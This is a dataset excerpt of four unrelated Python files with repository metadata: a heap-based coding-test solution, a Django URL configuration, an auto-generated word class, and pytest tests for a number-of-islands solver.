0052186786f9135544da4bbd4cbbd0182d70d987 | 2c9db62ddaffd77c097b3da4990021270912ea40 | /프로그래머스/42626.py | 0fee2888d34a12c55c57058eb42adda113a2d477 | [] | no_license | nahyun119/algorithm | 9ae120fbe047819a74e06fc6879f55405bc9ea71 | 40e291305a4108266073d489e712787df1dbae4b | refs/heads/master | 2023-08-27T23:18:44.133748 | 2021-10-03T11:32:12 | 2021-10-03T11:32:12 | 326,661,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | import heapq
def solution(scoville, K):
answer = 0
q = []
for s in scoville:
heapq.heappush(q, s)
is_done = False
while q:
s = heapq.heappop(q)
if not q:
if s >= K:
is_done = True
break
if s < K: # 맨처음 원소가 작다면
s2 = heapq.heappop(q)
heapq.heappush(q, s + s2 * 2)
answer += 1
else:
is_done = True
break
if not is_done:
return -1
return answer | [
"nahyun858@gmail.com"
] | nahyun858@gmail.com |
fae041b6f545357627db8a4e4d1117a61ad3b850 | 507daab36fdc1be0008d5dbcdb4402e299f6da8a | /mysite/mysite/urls.py | 461a1e33e3c7ee75eabf8812862d0bc858b88bf1 | [] | no_license | atmosphere1365/mastered | 057cf80b9969bfba690aef4009e4f6b39703471d | b777728eb656b4fc209c1cb2592ed35fc0864b83 | refs/heads/master | 2020-09-16T09:35:50.941166 | 2019-11-24T11:24:43 | 2019-11-24T11:24:43 | 223,729,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('grappelli/', include('grappelli.urls')), # grappelli URLS
path('admin/', admin.site.urls),
path('', include('mainApp.urls')),
path('007', include('blog.urls')),
path('news/', include('news.urls')),
] | [
"you@example.com"
] | you@example.com |
6f1a8f80c6cc21deb42ee605ff08484974623be8 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_interviewed.py | 661432027101ffd3f901f39af597b5a42f7dd1a0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py |
from xai.brain.wordbase.verbs._interview import _INTERVIEW
#calss header
class _INTERVIEWED(_INTERVIEW, ):
def __init__(self,):
_INTERVIEW.__init__(self)
self.name = "INTERVIEWED"
self.specie = 'verbs'
self.basic = "interview"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
3c4f0d6329fae0254ec8bb1115b4712d8a53553f | a8314fb4e71a229f2288ca0588bbb3ebd58b7db0 | /leet/number_of_islands/test.py | 2920c806eccab6da138ebbf27ddc5c6f99a14a53 | [] | no_license | blhwong/algos_py | 6fc72f1c15fe04f760a199535a0df7769f6abbe6 | 9b54ad6512cf0464ecdd084d899454a99abd17b2 | refs/heads/master | 2023-08-30T17:45:51.862913 | 2023-07-24T18:56:38 | 2023-07-24T18:56:38 | 264,782,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | from leet.number_of_islands.main import Solution
s = Solution()
def test_1():
grid = [
['1','1','1','1','0'],
['1','1','0','1','0'],
['1','1','0','0','0'],
['0','0','0','0','0']
]
assert s.numIslands(grid) == 1
def test_2():
grid = [
['1', '1', '0', '0', '0'],
['1', '1', '0', '0', '0'],
['0', '0', '1', '0', '0'],
['0', '0', '0', '1', '1']
]
assert s.numIslands(grid) == 3
| [
"brandon@yerdle.com"
] | brandon@yerdle.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.